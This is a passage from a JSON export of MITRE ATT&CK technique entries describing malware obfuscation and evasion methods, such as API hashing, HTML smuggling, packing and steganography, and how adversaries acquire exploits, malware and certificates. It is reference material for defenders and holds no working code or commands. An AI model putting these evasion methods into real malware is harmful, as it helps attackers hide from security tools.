"description": "Adversaries may obfuscate then dynamically resolve API functions called by their malware in order to conceal malicious functionalities and impair defensive analysis. Malware commonly uses various [Native API](https://app.tidalcyber.com/technique/1120f5ec-ef1b-4596-8d8b-a3979a766560) functions provided by the OS to perform various tasks such as those involving processes, files, and other system artifacts.\n\nAPI functions called by malware may leave static artifacts such as strings in payload files. Defensive analysts may also uncover which functions a binary file may execute via an import address table (IAT) or other structures that help dynamically link calling code to the shared modules that provide functions.<sup>[[Huntress API Hash](https://app.tidalcyber.com/references/e9f91661-29e3-408e-bfdd-c7df22f3f400)]</sup><sup>[[IRED API Hashing](https://app.tidalcyber.com/references/1b8b87d5-1b70-401b-8850-d8afd3b22356)]</sup>\n\nTo avoid static or other defensive analysis, adversaries may use dynamic API resolution to conceal malware characteristics and functionalities. Similar to [Software Packing](https://app.tidalcyber.com/technique/9ed5db23-3b2a-4a08-8602-bc8dff5c80f0), dynamic API resolution may change file signatures and obfuscate malicious API function calls until they are resolved and invoked during runtime.\n\nVarious methods may be used to obfuscate malware calls to API functions. For example, hashes of function names are commonly stored in malware in lieu of literal strings. Malware can use these hashes (or other identifiers) to manually reproduce the linking and loading process using functions such as `GetProcAddress()` and `LoadLibrary()`. These hashes/identifiers can also be further obfuscated using encryption or other string manipulation tricks (requiring various forms of [Deobfuscate/Decode Files or Information](https://app.tidalcyber.com/technique/88c2fb46-877a-4005-8425-7639d0da1920) during execution).<sup>[[BlackHat API Packers](https://app.tidalcyber.com/references/fc4434c0-373b-42fe-a0f5-683c24fa329e)]</sup><sup>[[Drakonia HInvoke](https://app.tidalcyber.com/references/11d936fd-aba0-4eed-8007-aca71c340c59)]</sup><sup>[[Huntress API Hash](https://app.tidalcyber.com/references/e9f91661-29e3-408e-bfdd-c7df22f3f400)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1027.007"
},
"related": [
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "9ef0ef16-b62c-4d09-b872-12c7e6adf2ed",
"value": "Dynamic API Resolution"
},
{
"description": "Adversaries may embed payloads within other files to conceal malicious content from defenses. Otherwise seemingly benign files (such as scripts and executables) may be abused to carry and obfuscate malicious payloads and content. In some cases, embedded payloads may also enable adversaries to [Subvert Trust Controls](https://app.tidalcyber.com/technique/73a8b954-93fe-466c-b73d-bd35bb08c3e7) by not impacting execution controls such as digital signatures and notarization tickets.<sup>[[Sentinel Labs](https://app.tidalcyber.com/references/785f7692-2be8-4f5d-921e-51efdfe0c0b9)]</sup> \n\nAdversaries may embed payloads in various file formats to hide payloads.<sup>[[Microsoft Learn](https://app.tidalcyber.com/references/73ba4e07-cfbd-4b23-b52a-1ebbd7cc0fe4)]</sup> This is similar to [Steganography](https://app.tidalcyber.com/technique/f22d0738-dcb7-40c2-99cf-b426ac54224a), though does not involve weaving malicious content into specific bytes and patterns related to legitimate digital media formats.<sup>[[GitHub PSImage](https://app.tidalcyber.com/references/449c873c-c5af-45b8-8bd7-505d2181a05c)]</sup> \n\nFor example, adversaries have been observed embedding payloads within or as an overlay of an otherwise benign binary.<sup>[[Securelist Dtrack2](https://app.tidalcyber.com/references/a011b68a-30e0-4204-9bf3-fa73f2a238b4)]</sup> Adversaries have also been observed nesting payloads (such as executables and run-only scripts) inside a file of the same format.<sup>[[SentinelLabs reversing run-only applescripts 2021](https://app.tidalcyber.com/references/34dc9010-e800-420c-ace4-4f426c915d2f)]</sup> \n\nEmbedded content may also be used as [Process Injection](https://app.tidalcyber.com/technique/7a6208ac-c75e-4e73-8969-0aaf6085cb6e) payloads used to infect benign system processes.<sup>[[Trend Micro](https://app.tidalcyber.com/references/2d4cb6f1-bc44-454b-94c1-88a81324903e)]</sup> These embedded then injected payloads may be used as part of the modules of malware designed to provide specific features such as encrypting C2 communications in support of an orchestrator module. For example, an embedded module may be injected into default browsers, allowing adversaries to then communicate via the network.<sup>[[Malware Analysis Report ComRAT](https://app.tidalcyber.com/references/9d81e2c8-09d5-4542-9c60-13a22a5a0073)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1027.009"
},
"related": [
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "81564f1d-9c72-4d03-8561-b0d255f76c5f",
"value": "Embedded Payloads"
},
{
"description": "Adversaries may store data in \"fileless\" formats to conceal malicious activity from defenses. Fileless storage can be broadly defined as any format other than a file. Common examples of non-volatile fileless storage include the Windows Registry, event logs, or WMI repository.<sup>[[Microsoft Fileless](https://app.tidalcyber.com/references/263fc1ab-f928-583f-986d-1e1bae9b3c85)]</sup><sup>[[SecureList Fileless](https://app.tidalcyber.com/references/03eb080d-0b83-5cbb-9317-c50b35996c9b)]</sup>\n\nSimilar to fileless in-memory behaviors such as [Reflective Code Loading](https://app.tidalcyber.com/technique/ef85800b-080d-4739-9f3b-91b61314a93e) and [Process Injection](https://app.tidalcyber.com/technique/7a6208ac-c75e-4e73-8969-0aaf6085cb6e), fileless data storage may remain undetected by anti-virus and other endpoint security tools that can only access specific file formats from disk storage.\n\nAdversaries may use fileless storage to conceal various types of stored data, including payloads/shellcode (potentially being used as part of [Persistence](https://app.tidalcyber.com/tactics/ec4f9786-c00c-430a-bc6d-0d0d22fdd393)) and collected data not yet exfiltrated from the victim (e.g., [Local Data Staging](https://app.tidalcyber.com/technique/8e32b6ed-58b1-4708-8b86-bd29c3a544d2)). Adversaries also often encrypt, encode, splice, or otherwise obfuscate this fileless data when stored.\n\nSome forms of fileless storage activity may indirectly create artifacts in the file system, but in central and otherwise difficult to inspect formats such as the WMI (e.g., `%SystemRoot%\\System32\\Wbem\\Repository`) or Registry (e.g., `%SystemRoot%\\System32\\Config`) physical files.<sup>[[Microsoft Fileless](https://app.tidalcyber.com/references/263fc1ab-f928-583f-986d-1e1bae9b3c85)]</sup> ",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1027.011"
},
"related": [
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "c41cb2d3-ff4c-5ee7-99b9-8a3d7987c9bf",
"value": "Fileless Storage"
},
{
"description": "Adversaries may smuggle data and files past content filters by hiding malicious payloads inside of seemingly benign HTML files. HTML documents can store large binary objects known as JavaScript Blobs (immutable data that represents raw bytes) that can later be constructed into file-like objects. Data may also be stored in Data URLs, which enable embedding media type or MIME files inline of HTML documents. HTML5 also introduced a download attribute that may be used to initiate file downloads.<sup>[[HTML Smuggling Menlo Security 2020](https://app.tidalcyber.com/references/a9fc3502-66c2-4504-9886-458f8a803b5d)]</sup><sup>[[Outlflank HTML Smuggling 2018](https://app.tidalcyber.com/references/9a99f431-4d15-47f8-a31b-4f98671cd95d)]</sup>\n\nAdversaries may deliver payloads to victims that bypass security controls through HTML Smuggling by abusing JavaScript Blobs and/or HTML5 download attributes. Security controls such as web content filters may not identify smuggled malicious files inside of HTML/JS files, as the content may be based on typically benign MIME types such as <code>text/plain</code> and/or <code>text/html</code>. Malicious files or data can be obfuscated and hidden inside of HTML files through Data URLs and/or JavaScript Blobs and can be deobfuscated when they reach the victim (i.e. [Deobfuscate/Decode Files or Information](https://app.tidalcyber.com/technique/88c2fb46-877a-4005-8425-7639d0da1920)), potentially bypassing content filters.\n\nFor example, JavaScript Blobs can be abused to dynamically generate malicious files in the victim machine and may be dropped to disk by abusing JavaScript functions such as <code>msSaveBlob</code>.<sup>[[HTML Smuggling Menlo Security 2020](https://app.tidalcyber.com/references/a9fc3502-66c2-4504-9886-458f8a803b5d)]</sup><sup>[[MSTIC NOBELIUM May 2021](https://app.tidalcyber.com/references/047ec63f-1f4b-4b57-9ab5-8a5cfcc11f4d)]</sup><sup>[[Outlflank HTML Smuggling 2018](https://app.tidalcyber.com/references/9a99f431-4d15-47f8-a31b-4f98671cd95d)]</sup><sup>[[nccgroup Smuggling HTA 2017](https://app.tidalcyber.com/references/f5615cdc-bc56-415b-8e38-6f3fd1c33c88)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1027.006"
},
"related": [
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "f216978a-36c0-47f1-a4ad-5ef67c8ae72c",
"value": "HTML Smuggling"
},
{
"description": "Adversaries may remove indicators from tools if they believe their malicious tool was detected, quarantined, or otherwise curtailed. They can modify the tool by removing the indicator and using the updated version that is no longer detected by the target's defensive systems or subsequent targets that may use similar systems.\n\nA good example of this is when malware is detected with a file signature and quarantined by anti-virus software. An adversary who can determine that the malware was quarantined because of its file signature may modify the file to explicitly avoid that signature, and then re-use the malware.",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1027.005"
},
"related": [
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "2507fbbc-ea9e-4e18-9329-b728847d7462",
"value": "Indicator Removal from Tools"
},
{
"description": "Adversaries may smuggle commands to download malicious payloads past content filters by hiding them within otherwise seemingly benign windows shortcut files. Windows shortcut files (.LNK) include many metadata fields, including an icon location field (also known as the `IconEnvironmentDataBlock`) designed to specify the path to an icon file that is to be displayed for the LNK file within a host directory. \n\nAdversaries may abuse this LNK metadata to download malicious payloads. For example, adversaries have been observed using LNK files as phishing payloads to deliver malware. Once invoked (e.g., [Malicious File](https://app.tidalcyber.com/technique/3412ca73-2f25-452a-8e6e-5c28fe72ef78)), payloads referenced via external URLs within the LNK icon location field may be downloaded. These files may also then be invoked by [Command and Scripting Interpreter](https://app.tidalcyber.com/technique/a2184d53-63b1-4c40-81ed-da799080c36c)/[System Binary Proxy Execution](https://app.tidalcyber.com/technique/4060ad55-7ff1-4127-acad-808b2bc77655) arguments within the target path field of the LNK.<sup>[[Unprotect Shortcut](https://app.tidalcyber.com/references/b62d40bc-2782-538a-8913-429908c6a2ee)]</sup><sup>[[Booby Trap Shortcut 2017](https://app.tidalcyber.com/references/1a820fb8-3cff-584b-804f-9bad0592873b)]</sup>\n\nLNK Icon Smuggling may also be utilized post compromise, such as malicious scripts executing an LNK on an infected host to download additional malicious payloads. \n",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1027.012"
},
"related": [
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "e2911337-76ed-5834-b621-bb2b9a4205ee",
"value": "LNK Icon Smuggling"
},
{
"description": "Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.<sup>[[ESET FinFisher Jan 2018](https://app.tidalcyber.com/references/be169308-19e8-4ee9-8ff6-e08eb9291ef8)]</sup> \n\nUtilities used to perform software packing are called packers. Example packers are MPRESS and UPX. A more comprehensive list of known packers is available, but adversaries may create their own packing techniques that do not leave the same artifacts as well-known packers to evade defenses.<sup>[[Awesome Executable Packing](https://app.tidalcyber.com/references/565bf600-5657-479b-9678-803e991c88a5)]</sup> ",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1027.002"
},
"related": [
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "9ed5db23-3b2a-4a08-8602-bc8dff5c80f0",
"value": "Software Packing"
},
{
"description": "Adversaries may use steganography techniques in order to prevent the detection of hidden information. Steganographic techniques can be used to hide data in digital media such as images, audio tracks, video clips, or text files.\n\n[Duqu](https://app.tidalcyber.com/software/d4a664e5-9819-4f33-8b2b-e6f8e6a64999) was an early example of malware that used steganography. It encrypted the gathered information from a victim's system and hid it within an image before exfiltrating the image to a C2 server.<sup>[[Wikipedia Duqu](https://app.tidalcyber.com/references/5cf0101e-c036-4c1c-b322-48f04e2aef0b)]</sup> \n\nBy the end of 2017, a threat group used<code>Invoke-PSImage</code>to hide [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde) commands in an image file (.png) and execute the code on a victim's system. In this particular case the [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde) code downloaded another obfuscated script to gather intelligence from the victim's machine and communicate it back to the adversary.<sup>[[McAfee Malicious Doc Targets Pyeongchang Olympics](https://app.tidalcyber.com/references/e6b5c261-86c1-4b6b-8a5e-c6a454554588)]</sup> ",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1027.003"
},
"related": [
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "f22d0738-dcb7-40c2-99cf-b426ac54224a",
"value": "Steganography"
},
{
"description": "Adversaries may attempt to make a payload difficult to analyze by removing symbols, strings, and other human readable information. Scripts and executables may contain variables names and other strings that help developers document code functionality. Symbols are often created by an operating systems `linker` when executable payloads are compiled. Reverse engineers use these symbols and strings to analyze code and to identify functionality in payloads.<sup>[[Mandiant golang stripped binaries explanation](https://app.tidalcyber.com/references/60eb0109-9655-41ab-bf76-37b17bf9594a)]</sup><sup>[[intezer stripped binaries elf files 2018](https://app.tidalcyber.com/references/2d1faa93-fed5-4b0d-b6c9-72bbc4782201)]</sup>\n\nAdversaries may use stripped payloads in order to make malware analysis more difficult. For example, compilers and other tools may provide features to remove or obfuscate strings and symbols. Adversaries have also used stripped payload formats, such as run-only AppleScripts, a compiled and stripped version of [AppleScript](https://app.tidalcyber.com/technique/9f06ef9b-d587-41d3-8fc8-7d539dac5701), to evade detection and analysis. The lack of human-readable information may directly hinder detection and analysis of payloads.<sup>[[SentinelLabs reversing run-only applescripts 2021](https://app.tidalcyber.com/references/34dc9010-e800-420c-ace4-4f426c915d2f)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1027.008"
},
"related": [
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "018381a5-df0a-4636-9df2-294101fb2092",
"value": "Stripped Payloads"
},
{
"description": "Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses. \n\nPayloads may be compressed, archived, or encrypted in order to avoid detection. These payloads may be used during Initial Access or later to mitigate detection. Sometimes a user's action may be required to open and [Deobfuscate/Decode Files or Information](https://app.tidalcyber.com/technique/88c2fb46-877a-4005-8425-7639d0da1920) for [User Execution](https://app.tidalcyber.com/technique/b84435ab-2ff4-4b6f-ba71-b4b815474872). The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary. <sup>[[Volexity PowerDuke November 2016](https://app.tidalcyber.com/references/4026c055-6020-41bb-a4c8-54b308867023)]</sup> Adversaries may also use compressed or archived scripts, such as JavaScript. \n\nPortions of files can also be encoded to hide the plain-text strings that would otherwise help defenders with discovery. <sup>[[Linux/Cdorked.A We Live Security Analysis](https://app.tidalcyber.com/references/f76fce2e-2884-4b50-a7d7-55f08b84099c)]</sup> Payloads may also be split into separate, seemingly benign files that only reveal malicious functionality when reassembled. <sup>[[Carbon Black Obfuscation Sept 2016](https://app.tidalcyber.com/references/bed8ae68-9738-46fb-abc9-0004fa35636a)]</sup>\n\nAdversaries may also abuse [Command Obfuscation](https://app.tidalcyber.com/technique/d8406198-626c-5659-945e-2b5105fcd0c9) to obscure commands executed from payloads or directly via [Command and Scripting Interpreter](https://app.tidalcyber.com/technique/a2184d53-63b1-4c40-81ed-da799080c36c). Environment variables, aliases, characters, and other platform/language specific semantics can be used to evade signature based detections and application control mechanisms. <sup>[[FireEye Obfuscation June 2017](https://app.tidalcyber.com/references/6d1089b7-0efe-4961-8abc-22a882895377)]</sup> <sup>[[FireEye Revoke-Obfuscation July 2017](https://app.tidalcyber.com/references/e03e9d19-18bb-4d28-8c96-8c1cef89a20b)]</sup><sup>[[PaloAlto EncodedCommand March 2017](https://app.tidalcyber.com/references/069ef9af-3402-4b13-8c60-b397b0b0bfd7)]</sup> ",
"meta": {
"platforms": [
"Linux",
"macOS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
},
{
"dest-uuid": "8352a63b-7450-4946-93c9-b7434935d794",
"type": "similar"
},
{
"dest-uuid": "d8406198-626c-5659-945e-2b5105fcd0c9",
"type": "similar"
},
{
"dest-uuid": "bd52a415-2b7a-4048-84bf-b20f385b357e",
"type": "similar"
},
{
"dest-uuid": "9ef0ef16-b62c-4d09-b872-12c7e6adf2ed",
"type": "similar"
},
{
"dest-uuid": "81564f1d-9c72-4d03-8561-b0d255f76c5f",
"type": "similar"
},
{
"dest-uuid": "c41cb2d3-ff4c-5ee7-99b9-8a3d7987c9bf",
"type": "similar"
},
{
"dest-uuid": "f216978a-36c0-47f1-a4ad-5ef67c8ae72c",
"type": "similar"
},
{
"dest-uuid": "2507fbbc-ea9e-4e18-9329-b728847d7462",
"type": "similar"
},
{
"dest-uuid": "e2911337-76ed-5834-b621-bb2b9a4205ee",
"type": "similar"
},
{
"dest-uuid": "9ed5db23-3b2a-4a08-8602-bc8dff5c80f0",
"type": "similar"
},
{
"dest-uuid": "f22d0738-dcb7-40c2-99cf-b426ac54224a",
"type": "similar"
},
{
"dest-uuid": "018381a5-df0a-4636-9df2-294101fb2092",
"type": "similar"
}
],
"uuid": "046cc07e-8700-4536-9c5b-6ecb384f52b0",
"value": "Obfuscated Files or Information"
},
{
"description": "Adversaries may buy and/or steal code signing certificates that can be used during targeting. Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Code signing provides a level of authenticity for a program from the developer and a guarantee that the program has not been tampered with.<sup>[[Wikipedia Code Signing](https://app.tidalcyber.com/references/363e860d-e14c-4fcd-985f-f76353018908)]</sup> Users and/or security tools may trust a signed piece of code more than an unsigned piece of code even if they don't know who issued the certificate or who the author is.\n\nPrior to [Code Signing](https://app.tidalcyber.com/technique/9449c0d5-7445-45e0-9861-7aafd6531733), adversaries may purchase or steal code signing certificates for use in operations. The purchase of code signing certificates may be done using a front organization or using information stolen from a previously compromised entity that allows the adversary to validate to a certificate provider as that entity. Adversaries may also steal code signing materials directly from a compromised third-party.",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1588.003"
},
"related": [
{
"dest-uuid": "989d09c2-12b8-4419-9b34-a328cf295fff",
"type": "uses"
}
],
"uuid": "8bdeddbe-14aa-412a-883a-7d6fe286c60e",
"value": "Code Signing Certificates"
},
{
"description": "Adversaries may buy and/or steal SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. They include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner.\n\nAdversaries may purchase or steal SSL/TLS certificates to further their operations, such as encrypting C2 traffic (ex: [Asymmetric Cryptography](https://app.tidalcyber.com/technique/ce822cce-f7f1-4753-bff1-12e5bef66d53) with [Web Protocols](https://app.tidalcyber.com/technique/9a21ec7b-9714-4073-9bf3-4df41995c698)) or even enabling [Adversary-in-the-Middle](https://app.tidalcyber.com/technique/d98dbf30-c454-42ff-a9f3-2cd3319cc0d9) if the certificate is trusted or otherwise added to the root of trust (i.e. [Install Root Certificate](https://app.tidalcyber.com/technique/3a956db0-a3f0-442a-a981-db2ee20d60b2)). The purchase of digital certificates may be done using a front organization or using information stolen from a previously compromised entity that allows the adversary to validate to a certificate provider as that entity. Adversaries may also steal certificate materials directly from a compromised third-party, including from certificate authorities.<sup>[[DiginotarCompromise](https://app.tidalcyber.com/references/3c9b7b9a-d30a-4865-a96c-6e68d9e20452)]</sup> Adversaries may register or hijack domains that they will later purchase an SSL/TLS certificate for.\n\nCertificate authorities exist that allow adversaries to acquire SSL/TLS certificates, such as domain validation certificates, for free.<sup>[[Let's Encrypt FAQ](https://app.tidalcyber.com/references/96e1ccb9-bd5c-4716-8848-4c30e6eac4ad)]</sup>\n\nAfter obtaining a digital certificate, an adversary may then install that certificate (see [Install Digital Certificate](https://app.tidalcyber.com/technique/0b2a9df9-65c8-4a01-a0e6-d411e54a4c7b)) on infrastructure under their control.",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1588.004"
},
"related": [
{
"dest-uuid": "989d09c2-12b8-4419-9b34-a328cf295fff",
"type": "uses"
}
],
"uuid": "4c0db4e5-14e0-4fb7-88b0-bb391ce5ad58",
"value": "Digital Certificates - Duplicate2"
},
{
"description": "Adversaries may buy, steal, or download exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than developing their own exploits, an adversary may find/modify exploits from online or purchase them from exploit vendors.<sup>[[Exploit Database](https://app.tidalcyber.com/references/38f7b3ea-9959-4dfb-8216-a745d071e7e2)]</sup><sup>[[TempertonDarkHotel](https://app.tidalcyber.com/references/4de7960b-bd62-452b-9e64-b52a0d580858)]</sup><sup>[[NationsBuying](https://app.tidalcyber.com/references/a3e224e7-fe22-48d6-9ff5-35900f06c060)]</sup>\n\nIn addition to downloading free exploits from the internet, adversaries may purchase exploits from third-party entities. Third-party entities can include technology companies that specialize in exploit development, criminal marketplaces (including exploit kits), or from individuals.<sup>[[PegasusCitizenLab](https://app.tidalcyber.com/references/d248e284-37d3-4425-a29e-5a0c814ae803)]</sup><sup>[[Wired SandCat Oct 2019](https://app.tidalcyber.com/references/5f28adee-1313-48ec-895c-27341bd1071f)]</sup> In addition to purchasing exploits, adversaries may steal and repurpose exploits from third-party entities (including other adversaries).<sup>[[TempertonDarkHotel](https://app.tidalcyber.com/references/4de7960b-bd62-452b-9e64-b52a0d580858)]</sup>\n\nAn adversary may monitor exploit provider forums to understand the state of existing, as well as newly discovered, exploits. There is usually a delay between when an exploit is discovered and when it is made public. An adversary may target the systems of those known to conduct exploit research and development in order to gain that knowledge for use during a subsequent operation.\n\nAdversaries may use exploits during various phases of the adversary lifecycle (i.e. [Exploit Public-Facing Application](https://app.tidalcyber.com/technique/4695fd01-43a5-4aa9-ab1a-501fc0dfbd6a), [Exploitation for Client Execution](https://app.tidalcyber.com/technique/068df3d7-f788-44e4-9e6b-2ae443af1609), [Exploitation for Privilege Escalation](https://app.tidalcyber.com/technique/9cc715d7-9969-485f-87a2-c9f7ed3cc44c), [Exploitation for Defense Evasion](https://app.tidalcyber.com/technique/15b65bf2-dbe5-47bc-be09-ed97684bf391), [Exploitation for Credential Access](https://app.tidalcyber.com/technique/afdfa503-0464-4b42-a79c-a6fc828492ef), [Exploitation of Remote Services](https://app.tidalcyber.com/technique/51ff4ada-8a71-4801-9cb8-a6e216eaa4e4), and [Application or System Exploitation](https://app.tidalcyber.com/technique/2109de05-5b45-4519-94a2-6c04f7d88286)).",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1588.005"
},
"related": [
{
"dest-uuid": "989d09c2-12b8-4419-9b34-a328cf295fff",
"type": "uses"
}
],
"uuid": "8842e2e3-c4f8-446b-821b-5930cb15d30c",
"value": "Exploits"
},
{
"description": "Adversaries may buy, steal, or download malware that can be used during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, packers, and C2 protocols. Adversaries may acquire malware to support their operations, obtaining a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors.\n\nIn addition to downloading free malware from the internet, adversaries may purchase these capabilities from third-party entities. Third-party entities can include technology companies that specialize in malware development, criminal marketplaces (including Malware-as-a-Service, or MaaS), or from individuals. In addition to purchasing malware, adversaries may steal and repurpose malware from third-party entities (including other adversaries).",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1588.001"
},
"related": [
{
"dest-uuid": "989d09c2-12b8-4419-9b34-a328cf295fff",
"type": "uses"
}
],
"uuid": "49c73c13-2281-45d3-af26-ad52a1cecb7a",
"value": "Malware"
},
{
"description": "Adversaries may buy, steal, or download software tools that can be used during targeting. Tools can be open or closed source, free or commercial. A tool can be used for malicious purposes by an adversary, but (unlike malware) were not intended to be used for those purposes (ex: [PsExec](https://app.tidalcyber.com/software/73eb32af-4bd3-4e21-8048-355edc55a9c6)). Tool acquisition can involve the procurement of commercial software licenses, including for red teaming tools such as [Cobalt Strike](https://app.tidalcyber.com/software/9b6bcbba-3ab4-4a4c-a233-cd12254823f6). Commercial software may be obtained through purchase, stealing licenses (or licensed copies of the software), or cracking trial versions.<sup>[[Recorded Future Beacon 2019](https://app.tidalcyber.com/references/4e554042-53bb-44d4-9acc-44c86329ac47)]</sup>\n\nAdversaries may obtain tools to support their operations, including to support execution of post-compromise behaviors. In addition to freely downloading or purchasing software, adversaries may steal software and/or software licenses from third-party entities (including other adversaries).",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1588.002"
},
"related": [
{
"dest-uuid": "989d09c2-12b8-4419-9b34-a328cf295fff",
"type": "uses"
}
],
"uuid": "755c1883-4046-446b-a76a-88a842dd1c2c",
"value": "Tool"
},
{
"description": "Adversaries may acquire information about vulnerabilities that can be used during targeting. A vulnerability is a weakness in computer hardware or software that can, potentially, be exploited by an adversary to cause unintended or unanticipated behavior to occur. Adversaries may find vulnerability information by searching open databases or gaining access to closed vulnerability databases.<sup>[[National Vulnerability Database](https://app.tidalcyber.com/references/9b42dcc6-a39c-4d74-adc3-135f9ceac5ba)]</sup>\n\nAn adversary may monitor vulnerability disclosures/databases to understand the state of existing, as well as newly discovered, vulnerabilities. There is usually a delay between when a vulnerability is discovered and when it is made public. An adversary may target the systems of those known to conduct vulnerability research (including commercial vendors). Knowledge of a vulnerability may cause an adversary to search for an existing exploit (i.e. [Exploits](https://app.tidalcyber.com/technique/8842e2e3-c4f8-446b-821b-5930cb15d30c)) or to attempt to develop one themselves (i.e. [Exploits](https://app.tidalcyber.com/technique/5a57d258-0b23-431b-b50e-3150d2c0e52c)).",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1588.006"
},
"related": [
{
"dest-uuid": "989d09c2-12b8-4419-9b34-a328cf295fff",
"type": "uses"
}
],
"uuid": "fe96475a-3090-449d-91fd-ae73cb4d9c7c",
"value": "Vulnerabilities"
},
{
"description": "Adversaries may buy and/or steal capabilities that can be used during targeting. Rather than developing their own capabilities in-house, adversaries may purchase, freely download, or steal them. Activities may include the acquisition of malware, software (including licenses), exploits, certificates, and information relating to vulnerabilities. Adversaries may obtain capabilities to support their operations throughout numerous phases of the adversary lifecycle.\n\nIn addition to downloading free malware, software, and exploits from the internet, adversaries may purchase these capabilities from third-party entities. Third-party entities can include technology companies that specialize in malware and exploits, criminal marketplaces, or from individuals.<sup>[[NationsBuying](https://app.tidalcyber.com/references/a3e224e7-fe22-48d6-9ff5-35900f06c060)]</sup><sup>[[PegasusCitizenLab](https://app.tidalcyber.com/references/d248e284-37d3-4425-a29e-5a0c814ae803)]</sup>\n\nIn addition to purchasing capabilities, adversaries may steal capabilities from third-party entities (including other adversaries). This can include stealing software licenses, malware, SSL/TLS and code-signing certificates, or raiding closed databases of vulnerabilities or exploits.<sup>[[DiginotarCompromise](https://app.tidalcyber.com/references/3c9b7b9a-d30a-4865-a96c-6e68d9e20452)]</sup>",
"meta": {
"platforms": [
"PRE"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "989d09c2-12b8-4419-9b34-a328cf295fff",
"type": "uses"
},
{
"dest-uuid": "8bdeddbe-14aa-412a-883a-7d6fe286c60e",
"type": "similar"
},
{
"dest-uuid": "4c0db4e5-14e0-4fb7-88b0-bb391ce5ad58",
"type": "similar"
},
{
"dest-uuid": "8842e2e3-c4f8-446b-821b-5930cb15d30c",
"type": "similar"
},
{
"dest-uuid": "49c73c13-2281-45d3-af26-ad52a1cecb7a",
"type": "similar"
},
{
"dest-uuid": "755c1883-4046-446b-a76a-88a842dd1c2c",
"type": "similar"
},
{
"dest-uuid": "fe96475a-3090-449d-91fd-ae73cb4d9c7c",
"type": "similar"
}
],
"uuid": "a6740db8-10d6-4e5b-986b-7695d3fc4b85",
"value": "Obtain Capabilities"
},
{
"description": "Adversaries may abuse Microsoft Office add-ins to obtain persistence on a compromised system. Office add-ins can be used to add functionality to Office programs. <sup>[[Microsoft Office Add-ins](https://app.tidalcyber.com/references/99b20e30-76a8-4108-84ae-daf92058b44b)]</sup> There are different types of add-ins that can be used by the various Office products; including Word/Excel add-in Libraries (WLL/XLL), VBA add-ins, Office Component Object Model (COM) add-ins, automation add-ins, VBA Editor (VBE), Visual Studio Tools for Office (VSTO) add-ins, and Outlook add-ins. <sup>[[MRWLabs Office Persistence Add-ins](https://app.tidalcyber.com/references/a5b6ab63-0e6f-4789-a017-ceab1719ed85)]</sup><sup>[[FireEye Mail CDS 2018](https://app.tidalcyber.com/references/0af1795c-9cdd-43fa-8184-73f33d9f5366)]</sup>\n\nAdd-ins can be used to obtain persistence because they can be set to execute code when an Office application starts. ",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1137.006"
},
"related": [
{
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
"type": "uses"
}
],
"uuid": "ecca6c85-3d18-40c0-84d0-d5fb7ebd72b5",
"value": "Add-ins"
},
{
